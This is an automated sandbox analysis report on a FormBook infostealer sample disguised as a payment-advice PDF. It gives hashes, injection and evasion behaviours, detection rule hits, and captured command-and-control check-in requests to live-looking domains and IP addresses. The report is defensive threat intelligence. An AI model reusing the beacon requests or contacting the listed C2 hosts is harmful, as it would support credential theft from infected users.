Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPaymentAdviceNote_pdf.exe

Overview

General Information

Sample name:rPaymentAdviceNote_pdf.exe
Analysis ID:1569491
MD5:c05461f24e430ecaf9b9106de5cafa70
SHA1:fc9e05b0c90db7a9f782908664d11fa2144abaed
SHA256:ce0b1bf28e5d0fc774caafecde07534057e36df193dc2ea9599e256a0b2f4a2c
Tags:exeFormbookuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • rPaymentAdviceNote_pdf.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe" MD5: C05461F24E430ECAF9B9106DE5CAFA70)
    • svchost.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • lDBisuvfBkK.exe (PID: 7000 cmdline: "C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasautou.exe (PID: 2172 cmdline: "C:\Windows\SysWOW64\rasautou.exe" MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)
          • lDBisuvfBkK.exe (PID: 6992 cmdline: "C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              8.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ParentImage: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe, ParentProcessId: 7140, ParentProcessName: rPaymentAdviceNote_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ProcessId: 1020, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ParentImage: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe, ParentProcessId: 7140, ParentProcessName: rPaymentAdviceNote_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe", ProcessId: 1020, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-05T19:39:33.610591+010028554651A Network Trojan was detected192.168.2.749753104.21.77.7180TCP
                2024-12-05T19:39:58.567032+010028554651A Network Trojan was detected192.168.2.74981413.248.221.24380TCP
                2024-12-05T19:40:14.756618+010028554651A Network Trojan was detected192.168.2.749852163.44.185.18380TCP
                2024-12-05T19:41:08.348736+010028554651A Network Trojan was detected192.168.2.749892104.21.41.7480TCP
                2024-12-05T19:41:23.933756+010028554651A Network Trojan was detected192.168.2.74998785.159.66.9380TCP
                2024-12-05T19:41:39.431492+010028554651A Network Trojan was detected192.168.2.749991103.21.221.480TCP
                2024-12-05T19:41:54.185382+010028554651A Network Trojan was detected192.168.2.749995104.21.62.18480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-05T19:39:50.538723+010028554641A Network Trojan was detected192.168.2.74979013.248.221.24380TCP
                2024-12-05T19:39:53.202380+010028554641A Network Trojan was detected192.168.2.74980013.248.221.24380TCP
                2024-12-05T19:39:55.875039+010028554641A Network Trojan was detected192.168.2.74980613.248.221.24380TCP
                2024-12-05T19:40:06.746206+010028554641A Network Trojan was detected192.168.2.749834163.44.185.18380TCP
                2024-12-05T19:40:09.421842+010028554641A Network Trojan was detected192.168.2.749840163.44.185.18380TCP
                2024-12-05T19:40:12.187654+010028554641A Network Trojan was detected192.168.2.749846163.44.185.18380TCP
                2024-12-05T19:40:21.936562+010028554641A Network Trojan was detected192.168.2.749872104.21.41.7480TCP
                2024-12-05T19:40:24.608338+010028554641A Network Trojan was detected192.168.2.749880104.21.41.7480TCP
                2024-12-05T19:40:27.264616+010028554641A Network Trojan was detected192.168.2.749886104.21.41.7480TCP
                2024-12-05T19:41:16.108628+010028554641A Network Trojan was detected192.168.2.74998485.159.66.9380TCP
                2024-12-05T19:41:18.770881+010028554641A Network Trojan was detected192.168.2.74998585.159.66.9380TCP
                2024-12-05T19:41:21.436794+010028554641A Network Trojan was detected192.168.2.74998685.159.66.9380TCP
                2024-12-05T19:41:31.389983+010028554641A Network Trojan was detected192.168.2.749988103.21.221.480TCP
                2024-12-05T19:41:34.061876+010028554641A Network Trojan was detected192.168.2.749989103.21.221.480TCP
                2024-12-05T19:41:36.718050+010028554641A Network Trojan was detected192.168.2.749990103.21.221.480TCP
                2024-12-05T19:41:46.204411+010028554641A Network Trojan was detected192.168.2.749992104.21.62.18480TCP
                2024-12-05T19:41:48.859135+010028554641A Network Trojan was detected192.168.2.749993104.21.62.18480TCP
                2024-12-05T19:41:51.521368+010028554641A Network Trojan was detected192.168.2.749994104.21.62.18480TCP
                2024-12-05T19:42:01.171722+010028554641A Network Trojan was detected192.168.2.74999666.29.137.1080TCP
                2024-12-05T19:42:03.802758+010028554641A Network Trojan was detected192.168.2.74999766.29.137.1080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-05T19:39:50.538723+010028563181A Network Trojan was detected192.168.2.74979013.248.221.24380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: rPaymentAdviceNote_pdf.exeReversingLabs: Detection: 34%
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: rPaymentAdviceNote_pdf.exeJoe Sandbox ML: detected
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lDBisuvfBkK.exe, 0000000A.00000002.3091104280.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3093155257.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008A445A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AC6D1 FindFirstFileW,FindClose,0_2_008AC6D1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008AC75C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008AEF95
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008AF0F2
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008AF3F3
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008A37EF
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008A3B12
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008ABCBC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A5CC00 FindFirstFileW,FindNextFileW,FindClose,11_2_02A5CC00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4x nop then xor eax, eax11_2_02A4A080
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4x nop then pop edi11_2_02A4E774
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4x nop then mov ebx, 00000004h11_2_048304D8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49753 -> 104.21.77.71:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49790 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49790 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49800 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49814 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49846 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49852 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49834 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49872 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49840 -> 163.44.185.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49880 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49886 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49806 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49892 -> 104.21.41.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49995 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49991 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 104.21.62.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49987 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 66.29.137.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 66.29.137.10:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 104.21.62.184:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aziziyeescortg.xyz
                Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                Source: Joe Sandbox ViewIP Address: 163.44.185.183 163.44.185.183
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008B22EE
                Source: global trafficHTTP traffic detected: GET /wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP HTTP/1.1Host: www.aziziyeescortg.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwkB1wGODpj+x1UAb80+hCsFXkgAnUr413w2hk7wj/03GtdXjGHp26G6Z&0r=XzjtrBPP HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP HTTP/1.1Host: www.sankan-fukushi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /m7wz/?wVb0=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&0r=XzjtrBPP HTTP/1.1Host: www.conansog.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /80gy/?wVb0=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&0r=XzjtrBPP HTTP/1.1Host: www.beythome.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                Source: global trafficHTTP traffic detected: GET /0kli/?wVb0=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&0r=XzjtrBPP HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
